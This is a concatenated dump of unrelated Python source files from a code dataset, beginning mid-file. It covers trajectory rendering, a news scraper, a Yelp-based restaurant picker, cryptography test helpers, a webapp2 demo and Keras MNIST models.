PERFORMANCE OF THIS SOFTWARE.\n#\n# Jim Mainprice on Sunday June 13 2018\n\nfrom motion.trajectory import Trajectory\nimport time\nimport numpy as np\n\n\nclass TrajectoryOptimizationViewer:\n\n \"\"\" Wrapper around a Trajectory objective function\n tha can draw the inner optimization quantities \"\"\"\n\n def __init__(self, objective, draw=True, draw_gradient=True,\n use_3d_viewer=False):\n self.objective = objective\n self.viewer = None\n self._draw_gradient = False\n self._draw_hessian = False\n self._use_3d_viewer = use_3d_viewer\n if draw:\n self._draw_gradient = draw_gradient\n self._draw_hessian = draw_gradient\n self.init_viewer()\n\n def init_viewer(self):\n from . 
import workspace_renderer as renderer\n if not self._use_3d_viewer:\n self.viewer = renderer.WorkspaceOpenGl(self.objective.workspace)\n else:\n self.viewer = renderer.WorkspaceHeightmap(self.objective.workspace)\n self._draw_gradient = False\n self._draw_hessian = False\n self.reset_objective(self.objective)\n\n def reset_objective(self, objective):\n self.viewer.set_workspace(self.objective.workspace)\n self.viewer.draw_ws_background(self.objective.obstacle_potential)\n self.viewer.reset_objects()\n\n def draw_gradient(self, x):\n g = self.objective.objective.gradient(x)\n q_init = self.objective.q_init\n self.draw(\n Trajectory(q_init=q_init, x=x),\n Trajectory(q_init=q_init, x=-0.01 * g + x))\n\n def forward(self, x):\n return self.objective.objective(x)\n\n def gradient(self, x):\n if self.viewer is not None and self._draw_gradient:\n self.draw_gradient(x)\n return self.objective.objective.gradient(x)\n\n def hessian(self, x):\n if self.viewer is not None:\n if self._draw_hessian:\n self.draw_gradient(x)\n else:\n self.draw(Trajectory(q_init=self.objective.q_init, x=x))\n return self.objective.objective.hessian(x)\n\n def draw(self, trajectory, g_traj=None):\n\n if self.viewer is None:\n self.init_viewer()\n if self._use_3d_viewer:\n self.viewer.reset_spheres()\n\n q_init = self.objective.q_init\n for k in range(self.objective.T + 1):\n q = trajectory.configuration(k)\n color = (0, 0, 1) if k == 0 else (0, 1, 0)\n color = (1, 0, 0) if k == trajectory.T() else color\n if not self._use_3d_viewer:\n self.viewer.draw_ws_circle(.01, q, color)\n else:\n cost = self.objective.obstacle_potential(q)\n self.viewer.draw_ws_sphere(\n q, height=self.viewer.normalize_height(cost))\n if g_traj is not None:\n self.viewer.draw_ws_line([q, g_traj.configuration(k)])\n\n self.viewer.show()\n","sub_path":"pyrieef/rendering/optimization.py","file_name":"optimization.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"622957202","text":"__author__ = 'ah14aeb'\n\n###################################################################\n# Routine to read a Typhoon colour table into a python class\n# Created 24/05/2010 by RAC\n# Modification history:\n###################################################################\n\nfrom string import *\nfrom vtk import vtkColorTransferFunction\n\nclass typhoon_colour_table:\n def __init__(self,file):\n colour_data = typhoon_read_colour_table(file)\n self.colour_transfer_function = colour_data[0]\n self.reds = colour_data[1]\n self.greens = colour_data[2]\n self.blues = colour_data[3]\n self.name = colour_data[4]\n\n def dump(self):\n return self.colour_transfer_function, self.reds, self.greens, self.blues, self.name\n\n\ndef typhoon_read_colour_table(file):\n name = \"\"\n ff = open(file)\n lines = ff.readlines()\n ff.close()\n ctfun = vtkColorTransferFunction()\n rs,gs,bs = [],[],[]\n for i in lines:\n if i[0]!='#':\n idx,r,g,b = split(i)\n ctfun.AddRGBPoint(int(idx),float(r),float(g),float(b))\n rs.append(float(r))\n gs.append(float(g))\n bs.append(float(b))\n else:\n name = i[1:]\n\n return ctfun,rs,gs,bs,name\n","sub_path":"algos/com/SOM/Jim/typhoon_colour_table.py","file_name":"typhoon_colour_table.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"509999094","text":"import scrapy\r\nimport pdb\r\nimport pytz\r\nfrom datetime import datetime\r\nfrom newsbot.items import NewsbotItem\r\nfrom main.models import News\r\n\r\n
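# The spider below deduplicates against the Django ORM: it only schedules\r\n# a follow-up request for urls that News.objects.filter(post_url=...) has\r\n# not seen before, so parse_second runs for new articles only.\r\n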
class NewsSpider(scrapy.Spider):\r\n name = \"news\"\r\n def start_requests(self):\r\n\r\n url = 'https://nba.udn.com/nba/index?gr=www'\r\n\r\n yield scrapy.Request(url=url, callback=self.parse_first)\r\n\r\n def parse_first(self, response):\r\n selector = scrapy.Selector(response)\r\n news_url_list = selector.xpath('//*[@id=\"news_body\"]/dl//a/@href').extract()\r\n\r\n for news_url in news_url_list:\r\n\r\n # Only follow urls that are present and are not javascript pseudo-links\r\n if news_url and news_url != 'javascript:;':\r\n\r\n news_url = 'https://nba.udn.com' + news_url\r\n\r\n # Only fetch urls that have never been stored in the DB (new featured stories)\r\n if not News.objects.filter(post_url=news_url).exists():\r\n \r\n # Hand off to the second callback, which parses the page and builds the DjangoItem\r\n yield scrapy.Request(\r\n news_url,\r\n callback=self.parse_second\r\n )\r\n else:\r\n pass\r\n else:\r\n pass\r\n\r\n def parse_second(self, response):\r\n selector = scrapy.Selector(response)\r\n\r\n # Parse the fields\r\n news_url = response.url\r\n title = selector.css('.story_art_title::text').get()\r\n subtitle = selector.css('.shareBar__info--author::text').get()\r\n img_url = selector.xpath('//*[@id=\"story_body_content\"]//img/@data-src').extract_first()\r\n post_date = datetime.strptime(selector.css(\".shareBar__info--author span::text\").get(), '%Y-%m-%d %H:%M')\r\n create_date = datetime.now()\r\n p_list = selector.css('#story_body_content > span > p ::text').getall() \r\n p_list = [ x for x in p_list if x not in (' Getty Images', 'facebook', 'twitter', 'pinterest')]\r\n context = \"\".join(p_list)\r\n \r\n news = NewsbotItem(\r\n title=title,\r\n subtitle=subtitle,\r\n context=context,\r\n post_url=news_url,\r\n img_url=img_url,\r\n post_date=post_date,\r\n create_date=create_date\r\n )\r\n\r\n yield news\r\n","sub_path":"scrapy-news/ScrapyNews/mysite/newsbot/newsbot/spiders/news_spider.py","file_name":"news_spider.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"203333594","text":"import rauth\nimport re\nimport configparser\nimport random\n\n\ndef get_search_parameters(zipcode, range_meters=4000):\n \"\"\"Create search parameters for restaurant types.\"\"\"\n # Could be _get_search_parameters(x) since this is a helper function...\n # TODO : Maybe make it a helper function instead.\n\n params = {}\n params[\"term\"] = \"food\"\n params[\"location\"] = \"{}\".format(str(zipcode))\n params[\"radius_filter\"] = \"{}\".format(str(range_meters))\n # Too high of a limit means too many questions.\n # TODO : Find sweet spot.\n params[\"limit\"] = \"10\"\n\n return params\n\n\ndef get_results(params):\n \"\"\"Use search parameters to get search results.\"\"\"\n # Could be _get_results(x) since this is a helper function...\n # TODO : Maybe make it a helper function instead.\n\n # Keep api keys secret.\n\n # [api_keys]\n # consumer_key: adfjasdfahsdfaasdf\n # consumer_secret: asdhfajhsdfhasdf\n # token: asdhfjasdfhajsdfsa\n # token_secret: asdjfhahsdfasdjhfa\n\n # Except for the '# ' thats exactly how my config is formatted.\n\n c = configparser.ConfigParser()\n c.read(\"config.ini\")\n\n consumer_key = c.get('api_keys', 'consumer_key')\n consumer_secret = c.get('api_keys', 'consumer_secret')\n token = c.get('api_keys', 'token')\n token_secret = c.get('api_keys', 'token_secret')\n\n session = rauth.OAuth1Session(\n consumer_key=consumer_key,\n consumer_secret=consumer_secret,\n access_token=token,\n access_token_secret=token_secret)\n\n 
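# rauth's OAuth1Session signs each outgoing request with the credentials\n # above, so a plain GET with query params is all that's needed here.\n 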
request = session.get(\"http://api.yelp.com/v2/search\", params=params)\n\n data = request.json()\n session.close()\n\n return data\n\n\ndef perform_search(listoflocations):\n \"\"\"Perform search for multiple locations as input.\"\"\"\n # Not exactly necessary unless doing multiple locations...\n # TODO : Recode without needing this function.\n api_calls = []\n for zipcode, range_meters in listoflocations:\n params = get_search_parameters(zipcode, range_meters)\n api_calls.append(get_results(params))\n return api_calls\n\n\ndef take_only_categories(datafromsearch):\n \"\"\"Only take categories from Yelp search results.\"\"\"\n # Yelp returns large list of values, may need other values later.\n # But for now, we only need the categories to make initial list.\n\n # TODO : Potentially use a list comp. instead? Shorter.\n lis = []\n for location in datafromsearch:\n for business in location['businesses']:\n lis.append((str(business['categories'])))\n return lis\n\n\ndef format_search_results(readfile):\n \"\"\"Format searches so only the relevant section of each category is kept.\"\"\"\n # Yelp returns categories in format \"(Thai, thaifood)\". Only need Thai.\n filterRegex = re.compile(r\"'[A-Z].*?'\")\n categories_data = str(readfile)\n filteronly = set(filterRegex.findall(categories_data))\n\n finallist = []\n for item in filteronly:\n finallist.append(item.replace(\"'\", \"\"))\n\n return finallist\n\n\ndef write_to_file(filename, data):\n \"\"\"Write category results to file.\"\"\"\n # Really only needed to prevent calling yelp over and over while testing.\n # Testing not using this now. Most likely will delete soon.\n # Semi todo. Delete maybe? Can still use later so who knows.\n with open(filename, 'w') as f:\n for item in data:\n f.write(item)\n f.write('\\n')\n\n\ndef display_two_from_list(input_list):\n # Shuffle list so it's not the same order of questions every time.\n random.shuffle(input_list)\n list_chosen_final = []\n while len(input_list) >= 2: # Causes pop errors if we go till empty.\n list_choose_2_from = [] # list that displays 2 options for chooser.\n for i in range(2):\n list_choose_2_from.append(input_list.pop()) # Easy way to move.\n print('{}: (1), {}: (2) or neither: (0)'.format(list_choose_2_from[0],\n list_choose_2_from[1]))\n choice = input('Pick 1, 2, or 0. \\n')\n if choice not in ['1', '2', '0']:\n raise AssertionError(\"Invalid option.\")\n elif choice == '0':\n # Don't need to do anything.\n # Not returning results, or changing final list file.\n # TODO : Is there a better way than just pass?\n pass\n else:\n # choice 2 - 1 = 1 = 2nd choice / index since python starts from 0.\n list_chosen_final.append(list_choose_2_from.pop(int(choice) - 1))\n\n if len(input_list) == 1:\n # If len is 1, then something is left in original list.\n # Don't want to lose it, so we'll just transfer it anyway.\n # User will have to decide on it sooner or later.\n list_chosen_final.append(input_list[0])\n return list_chosen_final\n\n\ndef final_selection(input_list):\n random.shuffle(input_list) # Honestly probably don't need to shuffle tbh.\n # No need to worry about lists since there's only 2 options.\n print('{}: (1) or {}: (2)'.format(input_list[0], input_list[1]))\n choice = input('Pick 1 or 2. \\n')\n if choice not in ['1', '2']:\n raise AssertionError(\"Invalid option.\")\n else:\n # choice 2 - 1 = 1 = 2nd choice / index since python starts from 0.\n print('You picked: {}'.format(input_list[int(choice) - 1]))\n\n\n
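# Rough shape of the elimination flow in main() below: each pass through\n# display_two_from_list roughly halves the list (e.g. 10 categories -> at\n# most 5 -> 3 -> 2), and final_selection then picks between the last two.\n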
Format = ##### \\n')\n print('To respond, just type 1 or 2 that matches the options.')\n meters_or_miles = input('Do you use meters: (1) or miles: (2)? \\n')\n distance = input('How far are you willing to go? Format = ## no unnits \\n')\n\n if meters_or_miles == '2':\n distance = int(distance) * 1600 # This should be close enough?\n locations = [(mainzipcode, distance)]\n\n # Aight this part is a little trick to follow.\n # Funcctional programming is hard.\n # Perform search innately uses get_search_parameters and get_results\n # And then take_only_categories and format_search_results follow\n d = format_search_results(take_only_categories(perform_search(locations)))\n\n # This line is here just to show users once.\n # If in a function it would loop.\n print('You must pick option (1), option (2), or Neither (0).')\n while len(d) > 2: # List gets shorter each time.\n d = display_two_from_list(d)\n # Once list is down to 2 things, it will just run the final function.\n final_selection(d)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"275172064","text":"# https://leetcode.com/problems/rotate-string/description/\n\n\nclass Solution:\n def rotateString(self, A, B):\n \"\"\"\n :type A: str\n :type B: str\n :rtype: bool\n \"\"\"\n\n A2 = A + A\n len_A2 = len(A2)\n len_B = len(B)\n\n for i in range(len_A2-len_B+1):\n if A2[i:i+len_B] == B:\n return True\n\n return False\n","sub_path":"_PYTHON_/_problems_/_LC_/algorithms/rotate_string.py","file_name":"rotate_string.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"397365554","text":"import binascii\nimport os\n\nimport pytest\n\nfrom cryptography.hazmat.bindings import _ALL_BACKENDS\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives import hmac\nfrom cryptography.hazmat.primitives.ciphers import Cipher\n\nfrom ...utils import load_vectors_from_file\n\n\ndef generate_encrypt_test(param_loader, path, file_names, cipher_factory,\n mode_factory, only_if=lambda backend: True,\n skip_message=None):\n def test_encryption(self):\n for backend in _ALL_BACKENDS:\n for file_name in file_names:\n for params in load_vectors_from_file(\n os.path.join(path, file_name),\n param_loader\n ):\n yield (\n encrypt_test,\n backend,\n cipher_factory,\n mode_factory,\n params,\n only_if,\n skip_message\n )\n return test_encryption\n\n\ndef encrypt_test(backend, cipher_factory, mode_factory, params, only_if,\n skip_message):\n if not only_if(backend):\n pytest.skip(skip_message)\n plaintext = params.pop(\"plaintext\")\n ciphertext = params.pop(\"ciphertext\")\n cipher = Cipher(\n cipher_factory(**params),\n mode_factory(**params),\n backend=backend\n )\n encryptor = cipher.encryptor()\n actual_ciphertext = encryptor.update(binascii.unhexlify(plaintext))\n actual_ciphertext += encryptor.finalize()\n assert actual_ciphertext == binascii.unhexlify(ciphertext)\n decryptor = cipher.decryptor()\n actual_plaintext = decryptor.update(binascii.unhexlify(ciphertext))\n actual_plaintext += decryptor.finalize()\n assert actual_plaintext == binascii.unhexlify(plaintext)\n\n\ndef generate_stream_encryption_test(param_loader, path, file_names,\n cipher_factory, only_if=None,\n skip_message=None):\n def test_stream_encryption(self):\n for backend in _ALL_BACKENDS:\n for 
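The rotate-string record above slides a fixed-size window over A + A; the same doubling trick reduces to a single substring test with identical results:

def rotate_string(a, b):
    # b is a rotation of a exactly when it occurs inside a doubled copy of a
    return len(a) == len(b) and b in a + a

print(rotate_string('abcde', 'cdeab'))  # True
print(rotate_string('abcde', 'abced'))  # False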
file_name in file_names:\n for params in load_vectors_from_file(\n os.path.join(path, file_name),\n param_loader\n ):\n yield (\n stream_encryption_test,\n backend,\n cipher_factory,\n params,\n only_if,\n skip_message\n )\n return test_stream_encryption\n\n\ndef stream_encryption_test(backend, cipher_factory, params, only_if,\n skip_message):\n if not only_if(backend):\n pytest.skip(skip_message)\n plaintext = params.pop(\"plaintext\")\n ciphertext = params.pop(\"ciphertext\")\n offset = params.pop(\"offset\")\n cipher = Cipher(cipher_factory(**params), None, backend=backend)\n encryptor = cipher.encryptor()\n # throw away offset bytes\n encryptor.update(b\"\\x00\" * int(offset))\n actual_ciphertext = encryptor.update(binascii.unhexlify(plaintext))\n actual_ciphertext += encryptor.finalize()\n assert actual_ciphertext == binascii.unhexlify(ciphertext)\n decryptor = cipher.decryptor()\n decryptor.update(b\"\\x00\" * int(offset))\n actual_plaintext = decryptor.update(binascii.unhexlify(ciphertext))\n actual_plaintext += decryptor.finalize()\n assert actual_plaintext == binascii.unhexlify(plaintext)\n\n\ndef generate_hash_test(param_loader, path, file_names, hash_cls,\n only_if=None, skip_message=None):\n def test_hash(self):\n for backend in _ALL_BACKENDS:\n for file_name in file_names:\n for params in load_vectors_from_file(\n os.path.join(path, file_name),\n param_loader\n ):\n yield (\n hash_test,\n backend,\n hash_cls,\n params,\n only_if,\n skip_message\n )\n return test_hash\n\n\ndef hash_test(backend, algorithm, params, only_if, skip_message):\n if only_if is not None and not only_if(backend):\n pytest.skip(skip_message)\n msg = params[0]\n md = params[1]\n m = hashes.Hash(algorithm, backend=backend)\n m.update(binascii.unhexlify(msg))\n expected_md = md.replace(\" \", \"\").lower().encode(\"ascii\")\n assert m.finalize() == binascii.unhexlify(expected_md)\n\n\ndef generate_base_hash_test(algorithm, digest_size, block_size,\n only_if=None, skip_message=None):\n def test_base_hash(self):\n for backend in _ALL_BACKENDS:\n yield (\n base_hash_test,\n backend,\n algorithm,\n digest_size,\n block_size,\n only_if,\n skip_message,\n )\n return test_base_hash\n\n\ndef base_hash_test(backend, algorithm, digest_size, block_size, only_if,\n skip_message):\n if only_if is not None and not only_if(backend):\n pytest.skip(skip_message)\n\n m = hashes.Hash(algorithm, backend=backend)\n assert m.algorithm.digest_size == digest_size\n assert m.algorithm.block_size == block_size\n m_copy = m.copy()\n assert m != m_copy\n assert m._ctx != m_copy._ctx\n\n m.update(b\"abc\")\n copy = m.copy()\n copy.update(b\"123\")\n m.update(b\"123\")\n assert copy.finalize() == m.finalize()\n\n\ndef generate_long_string_hash_test(hash_factory, md, only_if=None,\n skip_message=None):\n def test_long_string_hash(self):\n for backend in _ALL_BACKENDS:\n yield(\n long_string_hash_test,\n backend,\n hash_factory,\n md,\n only_if,\n skip_message\n )\n return test_long_string_hash\n\n\ndef long_string_hash_test(backend, algorithm, md, only_if, skip_message):\n if only_if is not None and not only_if(backend):\n pytest.skip(skip_message)\n m = hashes.Hash(algorithm, backend=backend)\n m.update(b\"a\" * 1000000)\n assert m.finalize() == binascii.unhexlify(md.lower().encode(\"ascii\"))\n\n\ndef generate_hmac_test(param_loader, path, file_names, algorithm,\n only_if=None, skip_message=None):\n def test_hmac(self):\n for backend in _ALL_BACKENDS:\n for file_name in file_names:\n for params in load_vectors_from_file(\n 
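The cipher test helpers in this record all follow one shape: unhexlify the vector, encrypt, compare with the expected ciphertext, then decrypt and compare with the plaintext. A toy version of that round trip; the XOR "cipher" is an assumption used only so the sketch runs without the cryptography package:

import binascii

def xor_cipher(key, data):
    # stub standing in for cryptography's Cipher/encryptor/decryptor objects
    return bytes(b ^ key for b in data)

def round_trip_test(key, plaintext_hex, ciphertext_hex):
    pt = binascii.unhexlify(plaintext_hex)
    ct = binascii.unhexlify(ciphertext_hex)
    assert xor_cipher(key, pt) == ct   # encryption matches the vector
    assert xor_cipher(key, ct) == pt   # decryption restores the plaintext

round_trip_test(0x5a, '0001ff', '5a5ba5')
print('vectors ok')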
os.path.join(path, file_name),\n param_loader\n ):\n yield (\n hmac_test,\n backend,\n algorithm,\n params,\n only_if,\n skip_message\n )\n return test_hmac\n\n\ndef hmac_test(backend, algorithm, params, only_if, skip_message):\n if only_if is not None and not only_if(backend):\n pytest.skip(skip_message)\n msg = params[0]\n md = params[1]\n key = params[2]\n h = hmac.HMAC(binascii.unhexlify(key), algorithm, backend=backend)\n h.update(binascii.unhexlify(msg))\n assert h.finalize() == binascii.unhexlify(md.encode(\"ascii\"))\n\n\ndef generate_base_hmac_test(hash_cls, only_if=None, skip_message=None):\n def test_base_hmac(self):\n for backend in _ALL_BACKENDS:\n yield (\n base_hmac_test,\n backend,\n hash_cls,\n only_if,\n skip_message,\n )\n return test_base_hmac\n\n\ndef base_hmac_test(backend, algorithm, only_if, skip_message):\n if only_if is not None and not only_if(backend):\n pytest.skip(skip_message)\n key = b\"ab\"\n h = hmac.HMAC(binascii.unhexlify(key), algorithm, backend=backend)\n h_copy = h.copy()\n assert h != h_copy\n assert h._ctx != h_copy._ctx\n","sub_path":"tests/hazmat/primitives/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"449519049","text":"# That there are no users with tty sessions logged into the server\nimport subprocess\nimport os\n\ndef tty_session():\n\tresult = subprocess.check_output([\"who\"])\n\tno_of_lines = result.split('\\n')\n\tif len(no_of_lines) > 1:\n\t\treturn 1\n\telse:\n\t\treturn 0\n","sub_path":"tty_session.py","file_name":"tty_session.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"200334261","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('course', '0056_facility_tweaks'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='gradechange',\n name='attempt_id',\n field=models.CharField(default=b'main', max_length=50, null=True, help_text=b\"Grade changes are grouped by their 'attempt ID' where later grades with the same attempt ID supersede earlier ones.\", blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"course/migrations/0057_default_attempt_id_to_main.py","file_name":"0057_default_attempt_id_to_main.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"290919174","text":"#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport webapp2\nimport logging\nimport random\nimport jinja2\nimport os\nimport time\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n # self.response.write('I am the King!!!
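The tty_session record above splits the bytes returned by subprocess.check_output on a str separator, which fails on Python 3, and the trailing newline inflates the line count. A sketch of a more robust variant with the same contract (1 if anyone is logged in, else 0); it still shells out to `who`, so it assumes a Unix host:

import subprocess

def tty_session():
    # text=True yields str, and splitlines() drops the trailing newline,
    # so empty `who` output gives zero lines instead of one
    out = subprocess.check_output(['who'], text=True)
    return 1 if out.splitlines() else 0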
')\n # self.response.write('
Math with 7 and 14')\n template_vars = {\"timeofday\": time.asctime()}\n template = jinja_environment.get_template('templates/hello.html')\n self.response.write(template.render(template_vars))\n\nclass FormHandler(webapp2.RequestHandler):\n def post(self):\n realname = self.request.get(\"realname\")\n self.response.write(\"It Worked!! Name entered is: \" + realname)\n\nclass CounterHandler(webapp2.RequestHandler):\n def get(self):\n s = self.request.GET['startvalue']\n for i in range(int(s), 101):\n self.response.write(i)\n self.response.write(' ')\n\nclass GetUpHandler(webapp2.RequestHandler):\n def get(self):\n time = random.randint(0, 12)\n self.response.write('You worked on coding for ')\n self.response.write(time)\n self.response.write(' hours. ')\n if time > 3:\n self.response.write('Everybody get up and stretch!!! - Rob')\n else:\n self.response.write('Keep Going!!!!')\n\nclass MathHandler(webapp2.RequestHandler):\n def get(self):\n left = self.request.GET['left']\n sign = self.request.GET['sign']\n right = self.request.GET['right']\n # logging.info('LEFT=' + left)\n # self.response.write(\"It Worked!! Name entered is: \" + realname)\n # self.response.write(left)\n # self.response.write(sign)\n # self.response.write(right)\n # self.response.write(' = ')\n if sign == '+':\n answer = (float(left) + float(right))\n if sign == '-':\n answer = (float(left) - float(right))\n if sign == '*':\n answer = (float(left) * float(right))\n if sign == '/':\n answer = (float(left) / float(right))\n if sign == '%':\n answer = (float(left) % float(right))\n if sign == '^':\n answer = (pow(float(left), float(right))) #(left ** right)<--same\n expression = left + \" \" + sign + \" \" + right + \" = \"\n template_vars = {'ans': answer, 'exp': expression}\n template = jinja_environment.get_template('templates/answer.html')\n self.response.write(template.render(template_vars))\n self.response.write('
')\n\njinja_environment = jinja2.Environment(loader=\n jinja2.FileSystemLoader(os.path.dirname(__file__)))\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler),\n ('/count', CounterHandler),\n ('/stretch', GetUpHandler),\n ('/math', MathHandler),\n ('/formhandler', FormHandler)\n], debug=True)\n","sub_path":"appengine-practice/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"580243764","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\BitBucket\\djmicrosip_apps\\djmicrosip_reorden\\djmicrosip_reorden\\urls.py\n# Compiled at: 2016-02-03 17:34:37\nfrom django.conf.urls import patterns\nfrom . import views\nurlpatterns = patterns('', (\n '^$', views.index), (\n '^generar/$', views.genera_view), (\n '^generar_entradas/$', views.generaentrada_view), (\n '^generar_pedido/$', views.generapedido_view), (\n '^entradas_automaticas/$', views.entradas_automaticas_view), (\n '^salidas_automaticas/$', views.salidas_automaticas_view), (\n '^generar_auto/$', views.genera_auto_view), (\n '^preferencias/$', views.preferencias_view), (\n '^actualizar/$', views.UpdateDatabaseTable), (\n '^crea_documento/$', views.crea_documento_view))","sub_path":"pycfiles/djmicrosip_reorden-1.2.0/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"305716655","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Flatten, Input, Dropout\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint \n\n# 1. 데이터\n(x_train, y_train), (x_test, y_test) = mnist.load_data() # mnist 예제의 좋은기능 train set 과 test set을 나눠주는 기능이 있음\n\nprint(x_train.shape, x_test.shape) # (60000, 28, 28) (10000, 28, 28)\nprint(y_train.shape, y_test.shape) # (60000, ) (10000, )\n\n# 데이터 전처리 1.OneHotEncoding\nfrom tensorflow.keras.utils import to_categorical # 분류모델에서는 onehotencoding 필수\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\n\nprint(y_train.shape)\nprint(y_test.shape)\n\nx_train = x_train.reshape(60000, 28 * 28).astype(\"float32\") / 255. # .astype(\"type\") => 형 변환\nx_test = x_test.reshape(10000, 28 * 28).astype(\"float32\") / 255.\n\n# 2. 
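MathHandler above picks the arithmetic operation with a chain of if statements; a dispatch table over the operator module expresses the same mapping (the '^'-as-power choice mirrors the handler):

import operator

OPS = {
    '+': operator.add, '-': operator.sub, '*': operator.mul,
    '/': operator.truediv, '%': operator.mod,
    '^': operator.pow,   # the handler treats ^ as exponentiation, not XOR
}

def apply_op(left, sign, right):
    return OPS[sign](float(left), float(right))

print(apply_op('2', '^', '10'))  # 1024.0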
모델\nfrom tensorflow.keras.optimizers import Adam, RMSprop, Adadelta\nfrom tensorflow.keras.activations import selu, elu, relu\nfrom tensorflow.keras.layers import Activation, ReLU, ELU, LeakyReLU\n\n# keras model을 함수형태로 만들었음\ndef build_model(activation, drop = 0.5, optimizer = Adam, learning_rate = 0.001, node = 100 ):\n inputs = Input(shape = (28*28, ), name = 'input')\n\n x = Dense(256, activation = 'relu', name = 'hidden1')(inputs)\n x = Dropout(drop)(x)\n\n x = Dense(128, name = 'hidden2')(x)\n x = Activation(activation)(x)\n x = Dropout(drop)(x)\n\n x = Dense(64, name = 'hidden3')(x)\n x = LeakyReLU(alpha=0.3)(x)\n x = Dropout(drop)(x)\n\n outputs = Dense(10, activation='softmax', name = 'outputs')(x)\n\n model = Model(inputs = inputs, outputs = outputs)\n # early_stopping = EarlyStopping(monitor = 'val_loss', patience = stop)\n model.compile(optimizer = optimizer(learning_rate = learning_rate), metrics = ['accuracy'], loss = 'categorical_crossentropy')\n\n print(activation)\n print(optimizer)\n print(learning_rate)\n print(node)\n return model\n\n# GridSearch parameter 함수\ndef create_hyperparameter(): # 파라미터를 지정해줄때의 이름과 모델 함수에 들어있는 파라미터 변수 이름을 동일시켜야함\n batches = [30]\n # learning_rate = [0.1, 0.05, 0.001]\n learning_rate = [0.001]\n # optimizers = [Adam, RMSprop, Adadelta]\n optimizers = [RMSprop]\n # drop = np.linspace(0.1, 0.5, 5) # numpy가 아닌 튜플로 넣어주면 에러가 안생김\n dropout = [0.3]\n epochs = [3]\n node = [128] \n activation = ['relu', 'selu', 'elu']\n return{\"batch_size\" : batches, \"optimizer\" : optimizers, \"drop\" : dropout, \"epochs\" : epochs, \"learning_rate\" : learning_rate, \"node\" : node, \"activation\" : activation}\n\nhyperparameters = create_hyperparameter()\n\n# keras 모델을 sklearn에서 사용할수있게 바꿔주는 기능\nfrom tensorflow.keras.wrappers.scikit_learn import KerasClassifier\nmodel = KerasClassifier(build_fn=build_model, verbose = 1)\n\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nsearch = RandomizedSearchCV(model, hyperparameters, cv = 3)\nsearch.fit(x_train, y_train)\n\n# print(search.best_params_)\n\n# score = search.score(x_test, y_test)\n# print(\"최종 스코어 : \", score)\n\n# 결과\n# {'optimizer': 'adam', 'epochs': 50, 'drop': 0.3, 'batch_size': 30}\n# 334/334 [==============================] - 0s 1ms/step - loss: 0.1437 - accuracy: 0.9842\n# 최종 스코어 : 0.9842000007629395","sub_path":"keras2/keras72_RS_Activation.py","file_name":"keras72_RS_Activation.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"644723239","text":"from tensorflow.keras.layers import Input, Dense\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.datasets import mnist # データ読み込み用\nfrom tensorflow.keras.utils import to_categorical # データ読み込み用\n\n# Inputレイヤーからスタート(返り値はテンソル)\ninputs = Input(shape=(784,))\n\n# レイヤークラスのインスタンスはテンソルを引数に取れる(返り値はテンソル)\n# InputレイヤーとDenseレイヤー(1層目)を接続\nx = Dense(128, activation='relu')(inputs)\n\n# Denseレイヤー(1層目)とDenseレイヤー(2層目)を接続\nx = Dense(64, activation='relu')(x)\n\n# レイヤーのインスタンス化を切り分けることももちろん可能\noutput_layer = Dense(10, activation='softmax')\n\n# (別のモデル構成時にこのレイヤーを指定・再利用することも可能になる)\n# Denseレイヤー(2層目)とDenseレイヤー(3層目)を接続\npredictions = output_layer(x)\n\n# 